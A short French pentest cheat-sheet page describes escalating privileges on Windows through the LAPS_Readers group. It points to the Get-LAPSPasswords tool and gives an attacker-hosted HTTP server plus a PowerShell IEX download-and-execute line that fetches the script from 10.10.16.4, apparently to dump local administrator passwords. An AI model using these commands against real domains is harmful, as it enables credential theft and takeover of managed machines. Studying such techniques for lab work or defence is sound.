# LAPS Readers (whoami /priv) - Windows Privilege Escalation

> Le groupe **LAPS\_Readers** dans Windows est utilisé pour gérer l'accès aux mots de passe administratifs locaux stockés dans Active Directory (via la fonctionnalité **Local Administrator Password Solution**, ou LAPS). Les membres de ce groupe peuvent lire les mots de passe générés et stockés par LAPS pour les comptes administratifs locaux sur les machines gérées. Cela permet un accès contrôlé et sécurisé aux mots de passe tout en limitant les privilèges des utilisateurs non autorisés.

### **Utilisation de Get-LAPSPasswords pour extraire les mots de passe**

{% embed url="<https://github.com/kfosaaen/Get-LAPSPasswords>" %}

#### **Téléchargement du script Get-LAPSPasswords**&#x20;

```bash
python3 -m http.server 80
```

```bash
IEX(New-object Net.WebClient).downloadString('http://10.10.16.4/Get-LAPSPasswords.ps1')
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F5YPlEAvza4qq3nX77Ink%2Fimage.png?alt=media&#x26;token=47147597-3cb8-42ae-af74-f14473882ed2" alt=""><figcaption></figcaption></figure>

### **Exécution du script et récupération des mots de passe administratifs**

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FW2HcuOJAAB0VGbVXLwvU%2Fimage.png?alt=media&#x26;token=7d1b2236-9ac6-427a-b0fd-626c92db6af8" alt=""><figcaption></figcaption></figure>